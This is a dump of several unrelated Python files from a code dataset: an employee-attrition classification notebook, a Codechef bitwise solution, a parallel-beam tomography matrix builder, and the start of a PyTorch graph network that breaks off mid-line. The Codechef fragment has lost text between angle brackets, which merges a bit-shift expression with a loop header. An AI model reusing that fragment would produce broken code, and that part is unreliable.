'StockOptionLevel', 'Gender', 'PerformanceRating', 'JobInvolvement', 'JobLevel', 'JobRole', 'MaritalStatus', 'RelationshipSatisfaction']\n\n\n# In[56]:\n\n\ndf2 = df.groupby('Attrition').median()\n\n\n# In[57]:\n\n\ndf2[num_cols].style.highlight_max(color=\"lightgreen\")\n\n\n# In[59]:\n\n\ndf = df.drop(['PercentSalaryHike', 'YearsSinceLastPromotion','PerformanceRating', 'HourlyRate'], axis=1)\n\n\n# In[18]:\n\n\n#univariate analysis and data preprocessing and move to the model building section.\n\n\n# In[19]:\n\n\n#Univariate analysis of numerical columns\n\n\n# In[20]:\n\n\n# Checking summary statistics\ndf[num_cols].describe().T\n\n\n# In[21]:\n\n\n#Observations:\n\n#Average employee age is around 37 years. It has a high range, from 18 years to 60, indicating good age \n#diversity in the organization.\n#At least 50% of the employees live within a 7 KM radius of the organization. However, there are some \n#extreme values, given that the maximum value is 29 km.\n#The average monthly income of an employee is USD 6500. It has a high range of values from 1K-20K USD, \n#which is to be expected for any organization's income distribution. There is a big difference between\n#the 3rd quartile value (around USD 8400) and the maximum value (nearly USD 20000), showing that the \n#company's highest earners have a disproportionately large income in comparison to the rest of the \n#employees. Again, this is fairly common in most organizations.\n#The average salary hike of an employee is around 15%. At least 50% of employees got a salary hike of\n#14% or less, with the maximum salary hike being 25%.\n#The average number of years an employee is associated with the company is 7.\n#On average, the number of years since an employee got a promotion is ~2.19. 
The majority of employees\n#have been promoted since the last year.\n\n\n# In[22]:\n\n\n# Creating histograms\ndf[num_cols].hist(figsize = (14, 14))\n\nplt.show()\n\n\n# In[23]:\n\n\n#Observations:\n\n#The age distribution is close to a normal distribution, with the majority of employees between the ages\n#of 25 and 50.\n#DistanceFromHome also has a right-skewed distribution, meaning most employees live close to work but there \n#are a few that live further away.\n#MonthlyIncome and TotalWorkingYears are skewed to the right, indicating that the majority of workers are in \n#entry / mid-level positions in the organization.\n#The percentage salary hike is skewed to the right, which means employees are mostly getting lower percentage \n#salary increaseS.\n#The YearsAtCompany variable distribution shows a good proportion of workers with 10+ years, indicating a \n#significant number of loyal employees at the organization.\n#The YearsInCurrentRole distribution has three peaks at 0, 2, and 7. There are a few employees that have even \n#stayed in the same role for 15 years and more.\n#The YearsSinceLastPromotion variable distribution indicates that some employees have not received a promotion\n#in 10-15 years and are still working in the organization. These employees are assumed to be high work-experience \n#employees in upper-management roles, such as co-founders, C-suite employees, etc.\n#The distributions of DailyRate, HourlyRate, and MonthlyRate appear to be uniform and do not provide much \n#information. It could be that the daily rate refers to the income earned per extra day worked while the hourly\n#rate could refer to the same concept applied for extra hours worked per day. Since these rates tend to be \n#broadly similar for multiple employees in the same department, that explains the uniform distribution they show.\n\n\n# In[24]:\n\n\n#Univariate analysis for categorical variables\n\n\n# In[25]:\n\n\n# Printing the % sub categories of each category.\nfor i in cat_cols:\n \n print(df[i].value_counts(normalize = True))\n \n print('*' * 40)\n\n\n# In[26]:\n\n\n#Observations:\n#The employee attrition rate is ~16%.\n#Around 28% of the employees are working overtime. This number appears to be on the higher side and might\n#indicate a stressed employee work-life.\n#71% of the employees have traveled rarely, while around 19% have to travel frequently.\n#Around 73% of the employees come from an educational background in the Life Sciences and Medical fields.\n#Over 65% of employees work in the Research & Development department of the organization.\n#Nearly 40% of the employees have low (1) or medium-low (2) job satisfaction and environment satisfaction \n#in the organization, indicating that the morale of the company appears to be somewhat low.\n#Over 30% of the employees show low (1) to medium-low (2) job involvement.\n#Over 80% of the employees either have none or very few stock options.\n#In terms of performance ratings, none of the employees have rated lower than 3 (excellent).\n#About 85% of employees have a performance rating equal to 3 (excellent), while the remaining have a \n#rating of 4 (outstanding). 
This could either mean that the majority of employees are top performers, \n#or the more likely scenario is that the organization could be highly lenient with its performance appraisal \n#process.\n\n\n# In[27]:\n\n\n#Model Building - Approach\n#Data preparation.\n#Partition the data into a train and test set.\n#Build a model on the train data.\n#Tune the model if required.\n#Test the data on the test set.\n\n\n# In[28]:\n\n\n#Data preparation\n\n\n# In[29]:\n\n\n#Creating dummy variables for the categorical variables\n\n\n# In[30]:\n\n\n# Creating a list of columns for which we will create dummy variables\nto_get_dummies_for = ['BusinessTravel', 'Department', 'EducationField', 'Gender', 'MaritalStatus', 'JobRole']\n\n# Creating dummy variables\ndf = pd.get_dummies(data = df, columns = to_get_dummies_for, drop_first = True) \n\n# Mapping overtime and attrition\ndict_OverTime = {'Yes': 1, 'No': 0}\ndict_attrition = {'Yes': 1, 'No': 0}\n\ndf['OverTime'] = df.OverTime.map(dict_OverTime)\ndf['Attrition'] = df.Attrition.map(dict_attrition)\n\n\n# In[ ]:\n\n\n#Separating the independent variables (X) and the dependent variable (Y)\n\n\n# In[31]:\n\n\n# Separating the target variable and other variables\n\nY = df.Attrition\n\nX = df.drop(['Attrition'], axis = 1)\n\n\n# In[32]:\n\n\n#Splitting the data into 70% train and 30% test set\n\n\n# In[33]:\n\n\n# Splitting the data\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size = 0.3, random_state = 1, stratify = Y)\n\n\n# In[34]:\n\n\n# Creating metric function\n\ndef metrics_score(actual, predicted):\n    \n    print(classification_report(actual, predicted))\n    \n    cm = confusion_matrix(actual, predicted)\n    \n    plt.figure(figsize = (8, 5))\n    \n    sns.heatmap(cm, annot = True, fmt = '.2f', xticklabels = ['Not Attrite', 'Attrite'], yticklabels = ['Not Attrite', 'Attrite'])\n    \n    plt.ylabel('Actual')\n    \n    plt.xlabel('Predicted')\n    \n    plt.show()\n\n\n# In[35]:\n\n\n# Building decision tree model\ndt = DecisionTreeClassifier(class_weight = {0: 0.17, 1: 0.83}, random_state = 1)\n\n\n# In[36]:\n\n\n# Fitting decision tree model\ndt.fit(x_train, y_train)\n\n\n# In[37]:\n\n\n# Checking performance on the training dataset\ny_train_pred_dt = dt.predict(x_train)\n\nmetrics_score(y_train, y_train_pred_dt)\n\n\n# In[38]:\n\n\n#Observation:\n\n#The Decision tree is giving a 100% score for all metrics on the training dataset.\n\n\n# In[39]:\n\n\n# Checking performance on the test dataset\ny_test_pred_dt = dt.predict(x_test)\n\nmetrics_score(y_test, y_test_pred_dt)\n\n\n# In[60]:\n\n\nnp.round(dt.feature_importances_, 4)\n\n\n# In[40]:\n\n\n# Plot the feature importance\n\nimportances = dt.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance,importance_df.index)\n\n\n# In[41]:\n\n\n# Choose the type of classifier\ndtree_estimator = DecisionTreeClassifier(class_weight = {0: 0.17, 1: 0.83}, random_state = 1)\n\n# Grid of parameters to choose from\nparameters = {'max_depth': [4, 5, 6, 7], \n              'criterion': ['gini', 'entropy'],\n              'min_samples_leaf': [5, 10, 20, 25]\n             }\n\n# Type of scoring used to compare parameter combinations\nscorer = metrics.make_scorer(recall_score, pos_label = 1)\n\n# Run the grid search\ngridCV = GridSearchCV(dtree_estimator, parameters, scoring = scorer, cv = 10)\n\n# Fitting the grid search on the train data\ngridCV = 
gridCV.fit(x_train, y_train)\n\n# Set the classifier to the best combination of parameters\ndtree_estimator = gridCV.best_estimator_\n\n# Fit the best estimator to the data\ndtree_estimator.fit(x_train, y_train)\n\n\n# In[61]:\n\n\ngridCV.best_params_\n\n\n# In[42]:\n\n\n# Checking performance on the training dataset\ny_train_pred_dt = dtree_estimator.predict(x_train)\n\nmetrics_score(y_train, y_train_pred_dt)\n\n\n# In[43]:\n\n\n# Checking performance on the test dataset\ny_test_pred_dt = dtree_estimator.predict(x_test)\n\nmetrics_score(y_test, y_test_pred_dt)\n\n\n# In[44]:\n\n\nimportances = dtree_estimator.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[45]:\n\n\nfeatures = list(X.columns)\n\nplt.figure(figsize = (30, 20))\n\ntree.plot_tree(dt, max_depth = 4, feature_names = features, filled = True, fontsize = 12, node_ids = True, class_names = True)\n\nplt.show()\n\n\n# #Fitting the Random Forest classifier on the training data\n# rf_estimator = RandomForestClassifier(n_estimators=500, class_weight = \"balanced\", random_state = 1, max_depth=2)\n# \n# rf_estimator.fit(x_train, y_train)\n\n# In[64]:\n\n\n# Fitting the Random Forest classifier on the training data\nrf_estimator = RandomForestClassifier(n_estimators=500, class_weight = \"balanced\", random_state = 1, max_depth=2)\nrf_estimator.fit(x_train, y_train)\n\n\n# In[47]:\n\n\n# Checking performance on the training data\ny_pred_train_rf = rf_estimator.predict(x_train)\n\nmetrics_score(y_train, y_pred_train_rf)\n\n\n# In[48]:\n\n\n# Checking performance on the testing data\ny_pred_test_rf = rf_estimator.predict(x_test)\n\nmetrics_score(y_test, y_pred_test_rf)\n\n\n# In[49]:\n\n\nimportances = rf_estimator.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[69]:\n\n\n# Choose the type of classifier\nrf_estimator_tuned = RandomForestClassifier(class_weight =\"balanced\", random_state = 1)\n\n# Grid of parameters to choose from\nparams_rf = { \"max_depth\": [2,3,4,5,6],\n \"n_estimators\": [100, 250, 500],\n \"min_samples_leaf\": np.arange(1, 4, 1),\n \"max_features\": ['log2', 'auto'],\n}\n\n\n# Type of scoring used to compare parameter combinations - recall score for class 1\nscorer = \"recall\"\n\n# Run the grid search\ngrid_obj = GridSearchCV(rf_estimator_tuned, params_rf, scoring = \"recall\", cv = 3, n_jobs=-1)\n\ngrid_obj2 = grid_obj.fit(x_train, y_train)\n\n# Set the classifier to the best combination of parameters\nrf_estimator_tuned = grid_obj2.best_estimator_\n\n\n# In[66]:\n\n\nrf_estimator_tuned.fit(x_train, y_train)\n\n\n# In[67]:\n\n\n# Checking performance on the training data\ny_pred_train_rf_tuned = rf_estimator_tuned.predict(x_train)\n\nmetrics_score(y_train, y_pred_train_rf_tuned)\n\n\n# In[68]:\n\n\n# Plotting feature importance\nimportances = rf_estimator_tuned.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[ 
]:\n\n\n\n\n","repo_name":"Hangzhouer22/machine-learning","sub_path":"machine learning employee attrition.py","file_name":"machine learning employee attrition.py","file_ext":"py","file_size_in_byte":17878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34357820830","text":"import random\ndef bruteForce(x,y,l,r):\n maxVal = -1\n zMax = 0\n for num in range(l, r+1):\n temp = F(x,y,num)\n if temp > maxVal:\n maxVal = temp\n zMax = num\n return zMax\nclass Bit:\n def setBit(self, num, pos):\n return num|(1<0:\n pos-=1\n currMax = float(\"-inf\")\n z = 0\n possibleValues = [l,r]\n for posForZ1 in range(pos-1, -1, -1):\n if bitObj.getBit(l, posForZ1):\n continue\n z1 = bitObj.setBit(l, posForZ1)\n for rest in range(posForZ1-1, -1, -1):\n if bitObj.getBit(x, rest) or bitObj.getBit(y, rest):#to minimize the value\n z1 = bitObj.setBit(z1, rest)\n else:\n z1 = bitObj.unsetBit(z1, rest)\n possibleValues.append(z1)\n for posForZ2 in range(pos-1, -1, -1):\n if not bitObj.getBit(r, posForZ2):\n continue\n z2 = bitObj.unsetBit(r, posForZ2)#unsetting the bit to make it less than r\n for rest in range(posForZ2-1, -1, -1):\n if bitObj.getBit(x, rest) or bitObj.getBit(y, rest):#to minimize the value\n z2 = bitObj.setBit(z2, rest)\n else:\n z2 = bitObj.unsetBit(z2, rest)\n possibleValues.append(z2)\n possibleValues.sort()\n for num in possibleValues:\n value = F(x,y, num)\n if value > currMax:\n z = num\n currMax = value\n # if z!= bruteForce(x,y,l,r):\n print(z)\n # break\n\n#\n#\n","repo_name":"subho2107/Codechef","sub_path":"May long challenge/chef and bitwise product.py","file_name":"chef and bitwise product.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12626981494","text":"def paralleltomo(*args):\r\n#PARALLELTOMO Creates a 2D tomography system matrix using parallel beams\r\n#\r\n# [A,theta,p,d] = paralleltomo(N)\r\n# [A,theta,p,d] = paralleltomo(N,theta)\r\n# [A,theta,p,d] = paralleltomo(N,theta,p)\r\n# [A,theta,p,d] = paralleltomo(N,theta,p,d)\r\n#\r\n# This function creates a 2D tomography test problem with an N-times-N\r\n# domain, using p parallel rays for each angle in the vector theta.\r\n#\r\n# Input: \r\n# N Scalar denoting the number of discretization intervals in \r\n# each dimesion, such that the domain consists of N^2 cells.\r\n# theta Vector containing the angles in degrees. Default: theta = \r\n# 0:1:179.\r\n# p Number of parallel rays for each angle. Default: p =\r\n# round(sqrt(2)*N).\r\n# d Scalar denoting the distance from the first ray to the last.\r\n# Default: d = sqrt(2)*N.\r\n#\r\n# Output:\r\n# A Coefficient matrix with N^2 columns and nA*p rows, \r\n# where nA is the number of angles, i.e., length(theta).\r\n# theta Vector containing the used angles in degrees.\r\n# p The number of used rays for each angle.\r\n# d The distance between the first and the last ray.\r\n# \r\n# See also: fanbeamtomo, seismictomo.\r\n\r\n#Anders Nymark Christensen, 20180216, DTU Compute\r\n#Revised from the matlab version by:\r\n \r\n# Jakob Sauer Jørgensen, Maria Saxild-Hansen and Per Christian Hansen,\r\n# October 1, 201r, DTU Compute.\r\n\r\n# Reference: A. C. Kak and M. 
Slaney, Principles of Computerized \r\n# Tomographic Imaging, SIAM, Philadelphia, 2001.\r\n \r\n\r\n import numpy as np\r\n from scipy.sparse import csr_matrix\r\n \r\n N = args[0]\r\n\r\n \r\n # Default value of d.\r\n if len(args) < 4:\r\n d = np.sqrt(2)*N\r\n else:\r\n d = args[3]\r\n \r\n # Default value of the number of rays.\r\n if len(args) < 3:\r\n p = int(round(np.sqrt(2)*N))\r\n else:\r\n p = args[2]\r\n\r\n # Default value of the angles theta.\r\n if len(args) < 2:\r\n theta = np.matrix(np.arange(0.,180.))\r\n else:\r\n theta = args[1]\r\n\r\n\r\n # Define the number of angles.\r\n nA = theta.shape[1]\r\n\r\n # The starting values both the x and the y coordinates. \r\n x0 = np.matrix(np.linspace(-d/2,d/2,p)).T\r\n y0 = np.matrix(np.zeros([p,1]))\r\n\r\n # The intersection lines.\r\n x = np.matrix(np.arange(-N/2,N/2 + 1)).T\r\n y = np.copy(x)\r\n\r\n # Initialize vectors that contains the row numbers, the column numbers and\r\n # the values for creating the matrix A effiecently.\r\n rows = np.matrix(np.zeros([2*N*nA*p,1]))\r\n cols = np.copy(rows)\r\n vals = np.copy(rows)\r\n idxend = 0\r\n\r\n\r\n # Loop over the chosen angles.\r\n for i in range(0,nA):\r\n \r\n # All the starting points for the current angle.\r\n x0theta = np.cos(np.deg2rad(theta[0,i]))*x0-np.sin(np.deg2rad(theta[0,i]))*y0\r\n y0theta = np.sin(np.deg2rad(theta[0,i]))*x0+np.cos(np.deg2rad(theta[0,i]))*y0\r\n \r\n # The direction vector for all the rays corresponding to the current \r\n # angle.\r\n a = -np.sin(np.deg2rad(theta[0,i]))\r\n b = np.cos(np.deg2rad(theta[0,i]))\r\n \r\n # Loop over the rays.\r\n for j in range(0,p):\r\n \r\n # Use the parametrisation of line to get the y-coordinates of\r\n # intersections with x = k, i.e. x constant.\r\n tx = (x - x0theta[j,0])/a\r\n yx = b*tx + y0theta[j,0]\r\n \r\n # Use the parametrisation of line to get the x-coordinates of\r\n # intersections with y = k, i.e. y constant.\r\n ty = (y - y0theta[j,0])/b\r\n xy = a*ty + x0theta[j,0] \r\n \r\n # Collect the intersection times and coordinates. 
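Crossings with the vertical (x = k) and horizontal (y = k) grid lines are stacked, then ordered along the ray by the parameter t.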
\r\n t = np.vstack([tx, ty])\r\n xxy = np.vstack([x, xy])\r\n yxy = np.vstack([yx, y])\r\n \r\n # Sort the coordinates according to intersection time.\r\n I = np.argsort(t,0)\r\n xxy = xxy[I]\r\n yxy = yxy[I] \r\n \r\n # Skip the points outside the box.\r\n I1 = np.logical_and(np.array(xxy) >= -N/2 , np.array(xxy) <= N/2)\r\n I2 = np.logical_and(np.array(yxy) >= -N/2 , np.array(yxy) <= N/2)\r\n I = np.squeeze(np.logical_and(I1,I2))\r\n #I = (xxy >= -N/2 & xxy <= N/2 & yxy >= -N/2 & yxy <= N/2)\r\n xxy = np.squeeze(xxy[I])\r\n yxy = np.squeeze(yxy[I])\r\n \r\n # Skip double points.\r\n I = np.logical_and(abs(np.diff(xxy)) <= 1e-10 , abs(np.diff(yxy)) <= 1e-10)\r\n if np.not_equal(I.size, 0):\r\n I = np.concatenate((I, np.matrix([False])), axis=1)\r\n xxy = xxy[~I]\r\n yxy = yxy[~I]\r\n# xxy = np.delete(xxy,I)\r\n# yxy = np.delete(yxy,I)\r\n \r\n # Calculate the length within cell and determines the number of\r\n # cells which is hit.\r\n d = np.sqrt(np.power(np.diff(xxy),2) + np.power(np.diff(yxy),2))\r\n numvals = d.shape[1]\r\n \r\n # Store the values inside the box.\r\n if numvals > 0:\r\n \r\n # If the ray is on the boundary of the box in the top or to the\r\n # right the ray does not by definition lie with in a valid cell.\r\n if not ((b == 0 and abs(y0theta[j,0] - N/2) < 1e-15) or (a == 0 and abs(x0theta[j,0] - N/2) < 1e-15)):\r\n \r\n # Calculates the midpoints of the line within the cells.\r\n xm = 0.5*(xxy[0,0:-1]+xxy[0,1:]) + N/2\r\n ym = 0.5*(yxy[0,0:-1]+yxy[0,1:]) + N/2\r\n \r\n # Translate the midpoint coordinates to index.\r\n col = np.floor(xm)*N + (N - np.floor(ym)) - 1\r\n \r\n # Create the indices to store the values to vector for\r\n # later creation of A matrix.\r\n idxstart = idxend\r\n idxend = idxstart + numvals\r\n idx = np.arange(idxstart,idxend)\r\n \r\n # Store row numbers, column numbers and values. 
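Each entry records the ray index (i*p + j), the flattened cell index, and the intersection length d.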
\r\n rows[idx,0] = i*p + j\r\n cols[idx,0] = col[0,:]\r\n vals[idx,0] = d \r\n\r\n\r\n # Truncate excess zeros.\r\n rows = rows[0:idxend]\r\n cols = cols[0:idxend]\r\n vals = vals[0:idxend]\r\n \r\n # Create sparse matrix A from the stored values.\r\n A = csr_matrix((vals[:,0].astype(np.float), (np.squeeze(np.array(rows[:,0]).astype(int)), np.squeeze(np.array(cols[:,0]).astype(int)))), dtype=np.float, shape=(p*nA, N**2)).toarray()\r\n\r\n \r\n return [A,theta,p,d]\r\n\r\nimport numpy as np\r\nN=8\r\ntheta = np.matrix([45.0000, 67.5000, 90.0000, 112.5000, 135.0000, 157.5000, 180.0000, 202.5000, 225.0000, 247.5000, 270.0000, 292.5000, 315.0000])\r\n[A,theta,p,d] = paralleltomo(N,theta,11)\r\n\r\nnp.linalg.matrix_rank(A)\r\n\r\nN=200\r\ntheta =np.matrix(np.linspace(0,179,179))\r\np = 250\r\n[A,theta,p,d] = paralleltomo(N,theta,p)\r\n","repo_name":"npeuker/MathModellingDTU","sub_path":"Exam Project/paralleltomo.py","file_name":"paralleltomo.py","file_ext":"py","file_size_in_byte":7168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39378918420","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport math\nimport numpy as np\nimport scipy.sparse as sp\n\n\ndef spec_normalize_adj(adj, high_order=False):\n adj = adj.to_dense().cpu().numpy()\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n adj_norm = adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n return torch.FloatTensor(adj_norm.todense())\n\n\ndef spac_normalize_adj(adj, high_order=False):\n adj = adj.to_dense().cpu().numpy()\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -1.).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n adj_norm = adj.dot(d_mat_inv_sqrt).transpose().tocoo()\n return torch.FloatTensor(adj_norm.todense())\n\n\ndef normalize_adj_torch(mx):\n mx = mx.to_dense()\n rowsum = mx.sum(1)\n r_inv_sqrt = torch.pow(rowsum, -0.5).flatten()\n r_inv_sqrt[torch.isinf(r_inv_sqrt)] = 0.\n r_mat_inv_sqrt = torch.diag(r_inv_sqrt)\n mx = torch.matmul(mx, r_mat_inv_sqrt)\n mx = torch.transpose(mx, 0, 1)\n mx = torch.matmul(mx, r_mat_inv_sqrt)\n return mx\n\n\nclass MLP(nn.Module):\n def __init__(self, in_ft, out_ft, act='prelu', bias=True):\n super().__init__()\n self.fc = nn.Linear(in_ft, out_ft, bias=bias)\n self.act = nn.PReLU() if act == 'prelu' else act\n\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\n self.bias.data.fill_(0.0)\n else:\n self.register_parameter('bias', None)\n\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, x):\n x_fts = self.fc(x)\n if self.bias is not None:\n x_fts += self.bias\n return self.act(x_fts)\n\n\nclass GCN_MI(nn.Module):\n def __init__(self, in_ft, out_ft, act='prelu', bias=True):\n super().__init__()\n self.fc = nn.Linear(in_ft, out_ft, bias=False)\n self.act = nn.PReLU() if act == 'prelu' else act\n\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\n self.bias.data.fill_(0.0)\n else:\n self.register_parameter('bias', None)\n\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Linear):\n 
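# Xavier-uniform init for the linear weights; the bias (if any) is zeroed just below\n            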
torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, A, x, sparse=False):\n x_fts = self.fc(x)\n if sparse:\n out = torch.unsqueeze(torch.spmm(A, torch.squeeze(x_fts, 0)), 0)\n else:\n out = torch.bmm(A.unsqueeze(0), x_fts.unsqueeze(0))\n if self.bias is not None:\n out += self.bias\n return self.act(out).squeeze(0)\n\n\nclass GCN(nn.Module):\n\n def __init__(self, in_dim, out_dim):\n super(GCN, self).__init__()\n self.proj = nn.Linear(in_dim, out_dim)\n self.drop = nn.Dropout(p=0.3)\n\n def forward(self, A, X, act=None):\n X = self.drop(X)\n X = torch.matmul(A, X)\n X = self.proj(X)\n if act is not None:\n X = act(X)\n return X\n\n\nclass Discriminator(nn.Module):\n def __init__(self, n_h):\n super().__init__()\n self.f_k = nn.Bilinear(n_h, n_h, 1)\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Bilinear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, c, h_pl, h_mi, s_bias1=None, s_bias2=None):\n c_x = c\n sc_1 = torch.squeeze(self.f_k(h_pl, c_x), -2)\n sc_2 = torch.squeeze(self.f_k(h_mi, c_x), -2)\n if s_bias1 is not None:\n sc_1 += s_bias1\n if s_bias2 is not None:\n sc_2 += s_bias2\n\n logits = torch.cat((sc_1, sc_2), 0).squeeze(-1)\n v = logits.shape[0]\n\n return logits, logits[:v//2]\n\n\nclass GraphCrossnet(nn.Module):\n def __init__(self, ks, in_dim, out_dim, dim=48, cross_weight=1.0, fuse_weight=1.0, R=1, cross_layer=2):\n super(GraphCrossnet, self).__init__()\n self.ks = ks\n self.cs_w = cross_weight\n self.fs_w = fuse_weight\n self.cs_l = cross_layer\n\n self.start_gcn_s1 = GCN(in_dim, dim)\n self.start_gcn_s2 = GCN(dim, dim)\n self.end_gcn = GCN(2*dim, out_dim)\n\n self.index_select_s1 = IndexSelect(ks[0], dim, act='prelu', R=R)\n self.index_select_s2 = IndexSelect(ks[1], dim, act='prelu', R=R)\n self.pool_s12_start = GraphPool(dim)\n self.pool_s23_start = GraphPool(dim)\n self.unpool_s21_end = GraphUnpool(dim)\n self.unpool_s32_end = GraphUnpool(dim)\n\n self.s1_l1 = GCN(dim, dim)\n self.s1_l2 = GCN(dim, dim)\n self.s1_l3 = GCN(dim, dim)\n self.s2_l1 = GCN(dim, dim)\n self.s2_l2 = GCN(dim, dim)\n self.s2_l3 = GCN(dim, dim)\n self.s3_l1 = GCN(dim, dim)\n self.s3_l2 = GCN(dim, dim)\n self.s3_l3 = GCN(dim, dim)\n\n if self.cs_l>=1:\n self.pool_s12_1 = GraphPool(dim, g=True)\n self.unpool_s21_1 = GraphUnpool(dim)\n self.pool_s23_1 = GraphPool(dim, g=True)\n self.unpool_s32_1 = GraphUnpool(dim)\n if self.cs_l>=2:\n self.pool_s12_2 = GraphPool(dim, g=True)\n self.unpool_s21_2 = GraphUnpool(dim)\n self.pool_s23_2 = GraphPool(dim, g=True)\n self.unpool_s32_2 = GraphUnpool(dim)\n\n def forward(self, A, x):\n\n A_s1 = A\n x_s1 = self.start_gcn_s1(A_s1, x)\n x_org = x_s1\n x_s1_ = torch.zeros_like(x_s1)\n x_s1_ = x_s1[torch.randperm(x_s1.shape[0]),:]\n ret_s1, value_s1, idx_s1, idx_s1_, Xdown_s1 = self.index_select_s1(x_s1, x_s1_, A_s1) \n x_s2, A_s2 = self.pool_s12_start(A_s1, x_s1, idx_s1, idx_s1_, value_s1, initlayer=True)\n\n x_s2 = self.start_gcn_s2(A_s2, x_s2)\n x_s2_ = torch.zeros_like(x_s2)\n x_s2_ = x_s2[torch.randperm(x_s2.shape[0]),:]\n ret_s2, value_s2, idx_s2, idx_s2_, Xdown_s2 = self.index_select_s2(x_s2, x_s2_, A_s2)\n x_s3, A_s3 = self.pool_s23_start(A_s2, x_s2, idx_s2, idx_s2_, value_s2, initlayer=True)\n\n res_s1_0, res_s2_0, res_s3_0 = x_s1, x_s2, x_s3\n\n x_s1 = self.s1_l1(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l1(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l1(A_s3, x_s3, F.relu)\n\n 
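# snapshot the level-1 features at every scale (res_*_1 are kept for reference; only the res_*_0 copies feed the residual sums below)\n        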
res_s1_1, res_s2_1, res_s3_1 = x_s1, x_s2, x_s3\n\n if self.cs_l >= 1:\n x_s12_fu = self.pool_s12_1(A_s1, x_s1, idx_s1, idx_s1_, value_s1)\n x_s21_fu = self.unpool_s21_1(A_s1, x_s2, idx_s1)\n x_s23_fu = self.pool_s23_1(A_s2, x_s2, idx_s2, idx_s2_, value_s2)\n x_s32_fu = self.unpool_s32_1(A_s2, x_s3, idx_s2)\n\n x_s1 = x_s1 + self.cs_w * x_s21_fu + res_s1_0\n x_s2 = x_s2 + self.cs_w * (x_s12_fu + x_s32_fu)/2 + res_s2_0\n x_s3 = x_s3 + self.cs_w * x_s23_fu + res_s3_0\n\n x_s1 = self.s1_l2(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l2(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l2(A_s3, x_s3, F.relu)\n\n if self.cs_l >= 2:\n x_s12_fu = self.pool_s12_2(A_s1, x_s1, idx_s1, idx_s1_, value_s1)\n x_s21_fu = self.unpool_s21_2(A_s1, x_s2, idx_s1)\n x_s23_fu = self.pool_s23_2(A_s2, x_s2, idx_s2, idx_s2_, value_s2)\n x_s32_fu = self.unpool_s32_2(A_s2, x_s3, idx_s2)\n\n x_s1 = x_s1 + self.cs_w * 0.05 * x_s21_fu\n x_s2 = x_s2 + self.cs_w * 0.05 * (x_s12_fu + x_s32_fu)/2\n x_s3 = x_s3 + self.cs_w * 0.05 * x_s23_fu\n\n x_s1 = self.s1_l3(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l3(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l3(A_s3, x_s3, F.relu)\n \n x_s3_out = self.unpool_s32_end(A_s2, x_s3, idx_s2) + Xdown_s2\n x_s2_out = self.unpool_s21_end(A_s1, x_s2 + x_s3_out, idx_s1)\n x_agg = x_s1 + x_s2_out * self.fs_w + Xdown_s1 * self.fs_w\n x_agg = torch.cat([x_agg, x_org], 1)\n x_agg = self.end_gcn(A_s1, x_agg)\n\n return x_agg, ret_s1, ret_s2\n\n\nclass IndexSelect(nn.Module):\n\n def __init__(self, k, n_h, act, R=1):\n super().__init__()\n self.k = k\n self.R = R\n self.sigm = nn.Sigmoid()\n self.fc = MLP(n_h, n_h, act)\n self.disc = Discriminator(n_h)\n self.gcn1 = GCN(n_h, n_h)\n\n def forward(self, seq1, seq2, A, samp_bias1=None, samp_bias2=None):\n h_1 = self.fc(seq1)\n h_2 = self.fc(seq2)\n h_n1 = self.gcn1(A, h_1)\n\n X = self.sigm(h_n1)\n ret, ret_true = self.disc(X, h_1, h_2, samp_bias1, samp_bias2)\n scores = self.sigm(ret_true).squeeze()\n num_nodes = A.shape[0]\n values, idx = torch.topk(scores, int(num_nodes))\n values1, idx1 = values[:int(self.k*num_nodes)], idx[:int(self.k*num_nodes)]\n values0, idx0 = 